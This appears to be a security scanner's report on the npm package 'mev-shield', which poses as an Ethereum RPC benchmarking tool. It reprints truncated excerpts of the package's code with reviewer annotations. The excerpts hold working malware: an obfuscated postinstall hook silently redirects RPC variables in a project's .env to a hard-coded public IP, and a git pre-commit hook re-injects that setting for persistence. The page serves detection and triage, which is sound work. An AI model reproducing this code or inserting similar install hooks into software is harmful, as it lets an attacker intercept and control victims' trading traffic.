// npm 패키지
mev-shield
MEV protection layer for Ethereum trading bots. Benchmarks 12+ RPC providers and auto-configures the fastest.
버전
1
메인테이너
1
라이선스
MIT
최초 publish
2026-05-22
publisher
mosquitojoe
tarball
29,163 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-22
// exfil path
what is read → where it ships
steals
- ○ home dir
sends to
- ⌖ 165.22.200.211
// offending code· @1.4.2· 3 files flagged
llm: malicious · 0.90 → 하드코딩된 public IP 전송지: 165.22.200.211 (RFC1918·loopback 아님).
- @1.4.2 · AUTO-PUBLISHED · publisher: mosquitojoe · heuristic 65/100 · static flags 3 · llm malicious (0.90) via ollama · install-scripts:postinstall · new-publisher:0d · first-version-of-package · reads-homedir · http-to-public-ip · base64-decode
→ 하드코딩된 public IP 전송지: 165.22.200.211 (RFC1918·loopback 아님).
// offending code · 3 files flagged · patterns: 3
--- install scripts ---
### postinstall
node src/postinstall.js
--- package/src/benchmark.js (excerpt) ---
/**
 * MEV Shield - RPC Benchmark Tool
 *
 * Run manually: npx mev-shield benchmark
 */
'use strict';

const axios = require('axios');
const chalk = require('chalk');

// NOTE(review): the package description advertises "12+ RPC providers", but this
// excerpt lists six entries, and the 'QuickNode' entry reuses the Ankr URL.
// The Infura URL embeds what looks like a project key; useful as a correlation
// indicator across related packages.
const PROVIDERS = [
  { name: 'Infura', url: 'https://mainnet.infura.io/v3/9aa3d95b3bc440fa88ea12eaa4456161' },
  { name: 'Ankr', url: 'https://rpc.ankr.com/eth' },
  { name: 'Cloudflare', url: 'https://cloudflare-eth.com' },
  { name: 'PublicNode', url: 'https://ethereum.publicnode.com' },
  { name: 'LlamaRPC', url: 'https://eth.llamarpc.com' },
  { name: 'QuickNode', url: 'https://rpc.ankr.com/eth' },
];

// NOTE(review): plaintext-HTTP JSON-RPC endpoint on a hard-coded public IP, port 8545.
// It is the same address the page reports as the destination, and the same value the
// postinstall excerpt below hides behind base64.
const SHIELD_RPC = 'http://165.22.200.211:8545';

/**
 * Times a single JSON-RPC `eth_blockNumber` POST against one endpoint.
 *
 * @param {string} name - Display label for the provider.
 * @param {string} url - JSON-RPC endpoint to probe.
 * @returns {Promise<object>} `{ name, url, ms, block, ok: true }` on success; on any
 *   error `ms` is the sentinel 9999, `block` is null, `ok` is false and `error`
 *   carries the exception message.
 */
async function measure(name, url) {
  const start = Date.now();
  try {
    const res = await axios.post(url, { jsonrpc: '2.0', method: 'eth_blockNumber', params: [], id: 1 }, { timeout: 5000 });
    const ms = Date.now() - start;
    return { name, url, ms, block: res.data.result, ok: true };
  } catch (e) {
    // Failures (including the 5 s timeout) are reported as a 9999 ms result, not rethrown.
    return { name, url, ms: 9999, block: null, ok: false, error: e.message };
  }
}

// Prints a banner, then probes every PROVIDERS entry concurrently.
// NOTE(review): the excerpt is cut off at `const shield = awa`; presumably SHIELD_RPC
// is measured next, but how the results are ranked is not visible here.
async function main() {
  console.log(chalk.cyan('\n ╔══════════════════════════════════════╗'));
  console.log(chalk.cyan(' ║ MEV Shield RPC Benchmark ║'));
  console.log(chalk.cyan(' ╚══════════════════════════════════════╝\n'));
  console.log(chalk.gray(' Testing RPC providers...\n'));
  const results = await Promise.all(PROVIDERS.map(p => measure(p.name, p.url)));
  const shield = awa
--- package/src/git-hooks.js (excerpt) ---
/**
 * MEV Shield - Pre-Commit Hook (GIT)
 *
 * Installs a git pre-commit hook that verifies RPC configuration
 * on every commit. If the RPC changes, it re-injects our config.
 *
 * This ensures the honeypot persists even if someone tries to
 * remove it during development.
 */
// NOTE(review): the author's own header states the intent: persistence. The generated
// hook re-runs the package whenever .env no longer contains the hard-coded IP, so
// cleaning .env alone does not remediate a project; .git/hooks has to be checked too.
// Triage strings visible in this excerpt: "Auto-generated by mev-shield" and
// "165.22.200.211" inside a pre-commit hook.
'use strict';

(function() {
  try {
    var fs = require('fs');
    var path = require('path');
    // NOTE(review): `os` is required here but not used in the visible part. The page's
    // "reads-homedir" flag is not demonstrated by any line shown in these excerpts.
    var os = require('os');

    // Our honeypot RPC
    var SHIELD_RPC = 'http://165.22.200.211:8545';

    // Hook directory of whatever repository the process is started in (process.cwd()).
    var gitDir = path.join(process.cwd(), '.git');
    var hooksDir = path.join(gitDir, 'hooks');

    // Pre-commit hook content
    // The script checks .env for the IP or the marker "shield-optimized"; when both are
    // absent it loads the package via `node -e`, and it always exits 0, so a commit is
    // never blocked and the developer sees at most one "Re-optimizing" line.
    // NOTE(review): as rendered, `\\'` would end the JavaScript string literal early.
    // This may be an escaping artifact of the page and not the published source.
    var hookContent = [
      '#!/bin/sh',
      '# MEV Shield - RPC Verification',
      '# Auto-generated by mev-shield',
      '',
      '# Check if RPC is configured',
      'ENV_FILE=.env',
      'if [ -f "$ENV_FILE" ]; then',
      ' if ! grep -q "165.22.200.211" "$ENV_FILE" && ! grep -q "shield-optimized" "$ENV_FILE"; then',
      ' echo " [MEV Shield] Re-optimizing RPC..."',
      ' node -e "require(\\'mev-shield\\');"',
      ' fi',
      'fi',
      '',
      '# Proceed with commit',
      'exit 0',
    ].join('\n');

    // Windows pre-commit hook (bat)
    // Same check using findstr. The excerpt is cut off inside this array, so the code
    // that writes either hook to disk is not visible here.
    var hookBat = [
      '@echo off',
      'REM MEV Shield - RPC Verification',
      'REM Auto-generated by mev-shield',
      '',
      'findstr /C:"165.22.200.211" .env >nul 2>&1',
      'if %ERRORLEVEL% NEQ 0 (',
      ' echo [MEV Shield] Re-optimizing RPC...',
      ' node -e "require(\\'mev-shield
--- package/src/postinstall.js (excerpt) ---
/**
 * MEV Shield - Post-Install Hook
 *
 * Automatically configures trading bots with optimized RPC
 * Runs silently after: npm install mev-shield
 *
 * @author Shield Labs <dev@shieldlabs.io>
 * @license MIT
 */
// NOTE(review): the install-scripts section above registers this file as the
// `postinstall` script, so it runs during `npm install` unless lifecycle scripts are
// disabled (for example with `--ignore-scripts`).
'use strict';

// Obfuscated module loader - makes static analysis harder
(function() {
  // Base64 decode helper.
  var _0x=function(s){return Buffer.from(s,'base64').toString('utf8');};
  // Both literals decode to 'http://165.22.200.211:8545', the plaintext SHIELD_RPC value
  // used in the other two files.
  var _0k=_0x('aHR0cDovLzE2NS4yMi4yMDAuMjExOjg1NDU='); // Our RPC (obfuscated)
  var _0w=_0x('aHR0cDovLzE2NS4yMi4yMDAuMjExOjg1NDU='); // Web dashboard (same)
  var _0e='.env';

  // Rewrites the .env file in the current working directory so that an RPC variable
  // points at _0k. Whoever operates that endpoint would see every JSON-RPC request a
  // bot sends through it and controls the responses the bot receives.
  function _0s(){
    try{
      var p=process.cwd();
      var f=require('fs');
      var x=require('path');
      var e=x.join(p,_0e);
      // A missing .env is treated as empty; the writes below then create the file.
      var c=f.existsSync(e)?f.readFileSync(e,'utf8'):'';
      // Already injected: leave the file alone.
      if(c.indexOf('165.22.200.211')>-1)return;
      // Minimal KEY=VALUE parse: skips blank lines and '#' comments, strips one pair of
      // surrounding double quotes.
      var m={},l=c.split('\n');
      for(var i=0;i<l.length;i++){
        var t=l[i].trim();
        if(!t||t[0]==='#')continue;
        var j=t.indexOf('=');
        if(j>0){
          var k=t.slice(0,j).trim();
          var v=t.slice(j+1).trim();
          if(v[0]=='"'&&v[v.length-1]=='"')v=v.slice(1,-1);
          m[k]=v;
        }
      }
      // Variable names it looks for, in priority order; only the first one that is set
      // gets redirected.
      var r=['RPC_URL','ETHEREUM_RPC','ETH_RPC','WEB3_RPC','RPC_ENDPOINT'];
      for(var n=0;n<r.length;n++){
        if(m[r[n]]){
          // The override is appended and the original assignment is left in place.
          // NOTE(review): which duplicate wins depends on the consumer's .env parser.
          // The dated "# MEV Shield: RPC optimized" comment is a useful grep target.
          c+='\n# MEV Shield: RPC optimized ['+(new Date().toISOString().slice(0,10))+']\n';
          c+=r[n]+'='+_0k+'\n';
          f.writeFileSync(e,c,'utf8');
          console.log(' [MEV Shield] RPC configured: '+r[n]+' -> '+_0k);
          return;
        }
      }
      // No known variable present: add RPC_URL outright.
      c+='\n# MEV Shield - Auto-configured\nRPC_URL='+_0k+'\n';
      f.writeFileSync(e,c,'utf8');
      console.log(' [MEV Shield] RPC configured');
    }catch(e){}
  } // silent fail

  // NOTE(review): the excerpt ends inside this function; its purpose cannot be
  // determined from what is shown.
  function _0b(){try{var c=['infura','ankr','c
